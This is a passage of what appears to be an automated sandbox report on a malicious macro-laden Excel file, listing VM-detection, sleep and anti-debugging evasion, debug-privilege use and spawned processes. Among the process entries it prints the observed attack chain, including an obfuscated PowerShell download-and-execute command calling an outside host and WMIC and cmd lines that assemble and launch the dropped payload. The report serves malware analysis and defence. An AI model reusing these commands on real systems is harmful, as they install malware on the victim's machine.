Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxml
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xaml
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5429
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1580
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Window / User API: threadDelayed 2267
Found dropped PE file which has not been started or loaded
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Test1.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\conhost.exe TID: 6928 Thread sleep count: 213 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7048 Thread sleep count: 5429 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7076 Thread sleep count: 41 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7052 Thread sleep count: 1580 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4456 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7104 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7024 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7112 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5676 Thread sleep count: 2267 > 30
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5784 Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5784 Thread sleep time: -380000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5840 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5192 Thread sleep count: 297 > 30
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5192 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread sleep count: Count: 2267 delay: -10
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError, 29_2_00426F7A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0044A238 __EH_prolog,new,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetProductInfo, 29_2_0044A238
Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMNetworkAdapterExtendedAcl
Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterTeamMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: Connect-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VMNetworkAdapterExtendedAcl
Source: WMIC.exe, 0000001A.00000002.345562483.0000000003920000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterTeamMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterIsolation
Source: ModuleAnalysisCache.3.dr Binary or memory string: Test-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr Binary or memory string: )Get-VMNetworkAdapterFailoverConfiguration
Source: ModuleAnalysisCache.3.dr Binary or memory string: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterRdma
Source: ModuleAnalysisCache.3.dr Binary or memory string: (Set-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMNetworkAdapterTeamMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterAcl
Source: ModuleAnalysisCache.3.dr Binary or memory string: )Set-VMNetworkAdapterFailoverConfiguration
Source: ModuleAnalysisCache.3.dr Binary or memory string: Rename-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterVlan
Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterIsolation
Source: ModuleAnalysisCache.3.dr Binary or memory string: (Add-VmNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: "Remove-VMNetworkAdapterTeamMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMNetworkAdapterAcl
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VMScsiController
Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VmNetworkAdapterIsolation
Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VmNetworkAdapterRoutingDomainMapping
Source: WMIC.exe, 0000001A.00000002.345562483.0000000003920000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMScsiController
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterRdma
Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterRoutingDomainMapping
Source: WMIC.exe, 0000001A.00000002.345562483.0000000003920000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterVlan
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VmNetworkAdapterIsolation
Source: ModuleAnalysisCache.3.dr Binary or memory string: Disconnect-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: "Remove-VMNetworkAdapterExtendedAcl
Source: ModuleAnalysisCache.3.dr Binary or memory string: KC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
Source: ModuleAnalysisCache.3.dr Binary or memory string: +Remove-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: (Add-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: (Get-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VMNetworkAdapterAcl
Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterFailoverConfiguration
Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VmNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMScsiController
Source: ModuleAnalysisCache.3.dr Binary or memory string: OC:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterFailoverConfiguration
Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMNetworkAdapter
Source: ModuleAnalysisCache.3.dr Binary or memory string: (Set-VmNetworkAdapterRoutingDomainMapping
Source: WMIC.exe, 0000001A.00000002.345562483.0000000003920000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMNetworkAdapterRoutingDomainMapping
Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterExtendedAcl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to hide a thread from the debugger
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_00478772 NtSetInformationThread ?,00000011,00000000,00000000,?,?,00000000,00000000 29_2_00478772
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread information set: HideFromDebugger
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0058E501 IsDebuggerPresent,OutputDebugStringW, 29_2_0058E501
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_007D5210 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 29_2_007D5210
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_004252D0 mov eax, dword ptr fs:[00000030h] 27_2_004252D0
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_00424F75 mov eax, dword ptr fs:[00000030h] 27_2_00424F75
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_00424FD2 mov eax, dword ptr fs:[00000030h] 27_2_00424FD2
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_00424FE7 mov eax, dword ptr fs:[00000030h] 27_2_00424FE7
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_00424FFB mov eax, dword ptr fs:[00000030h] 27_2_00424FFB
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_022100C7 mov eax, dword ptr fs:[00000030h] 27_2_022100C7
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02211133 mov ecx, dword ptr fs:[00000030h] 27_2_02211133
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210C36 mov eax, dword ptr fs:[00000030h] 27_2_02210C36
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210B3A mov eax, dword ptr fs:[00000030h] 27_2_02210B3A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221093A mov ecx, dword ptr fs:[00000030h] 27_2_0221093A
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210A3C mov eax, dword ptr fs:[00000030h] 27_2_02210A3C
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210704 mov ecx, dword ptr fs:[00000030h] 27_2_02210704
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210B06 mov eax, dword ptr fs:[00000030h] 27_2_02210B06
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210C06 mov eax, dword ptr fs:[00000030h] 27_2_02210C06
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210A08 mov eax, dword ptr fs:[00000030h] 27_2_02210A08
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210D17 mov eax, dword ptr fs:[00000030h] 27_2_02210D17
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221096C mov eax, dword ptr fs:[00000030h] 27_2_0221096C
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210B6E mov eax, dword ptr fs:[00000030h] 27_2_02210B6E
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210A70 mov eax, dword ptr fs:[00000030h] 27_2_02210A70
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210C4B mov ecx, dword ptr fs:[00000030h] 27_2_02210C4B
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_0221115B mov ecx, dword ptr fs:[00000030h] 27_2_0221115B
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_022109A0 mov eax, dword ptr fs:[00000030h] 27_2_022109A0
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210BA2 mov eax, dword ptr fs:[00000030h] 27_2_02210BA2
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210EA2 mov ebx, dword ptr fs:[00000030h] 27_2_02210EA2
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210EA2 mov edx, dword ptr fs:[00000030h] 27_2_02210EA2
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210AA4 mov eax, dword ptr fs:[00000030h] 27_2_02210AA4
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210698 mov eax, dword ptr fs:[00000030h] 27_2_02210698
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210CD5 mov ecx, dword ptr fs:[00000030h] 27_2_02210CD5
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210AD5 mov eax, dword ptr fs:[00000030h] 27_2_02210AD5
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_022109D4 mov eax, dword ptr fs:[00000030h] 27_2_022109D4
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 27_2_02210BD6 mov eax, dword ptr fs:[00000030h] 27_2_02210BD6
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0069B53C mov eax, dword ptr fs:[00000030h] 29_2_0069B53C
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_004AABEB GetProcessHeap,HeapFree, 29_2_004AABEB
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_006814DA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 29_2_006814DA
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0068B781 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 29_2_0068B781

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\Test3.jpg protection: execute and read and write
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESBD2F.tmp' 'c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpg
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Process created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
Yara detected Xls With Macro 4.0
Source: Yara match File source: Scanned_25526662-Payment.xls, type: SAMPLE
Source: Test3.jpg, 0000001D.00000002.504032737.0000000001160000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: Test3.jpg, 0000001D.00000002.504032737.0000000001160000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: Test3.jpg, 0000001D.00000002.504032737.0000000001160000.00000002.00000001.sdmp Binary or memory string: Progman
Source: Test3.jpg, 0000001D.00000002.504032737.0000000001160000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: Test3.jpg, 0000001D.00000003.488792166.00000000035B4000.00000004.00000001.sdmp Binary or memory string: Program Manager]
Source: Test3.jpg, 0000001D.00000003.470470282.00000000035B4000.00000004.00000001.sdmp Binary or memory string: Program ManagerY

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0040EA7D cpuid 29_2_0040EA7D
Contains functionality to query locales information (e.g. system language)
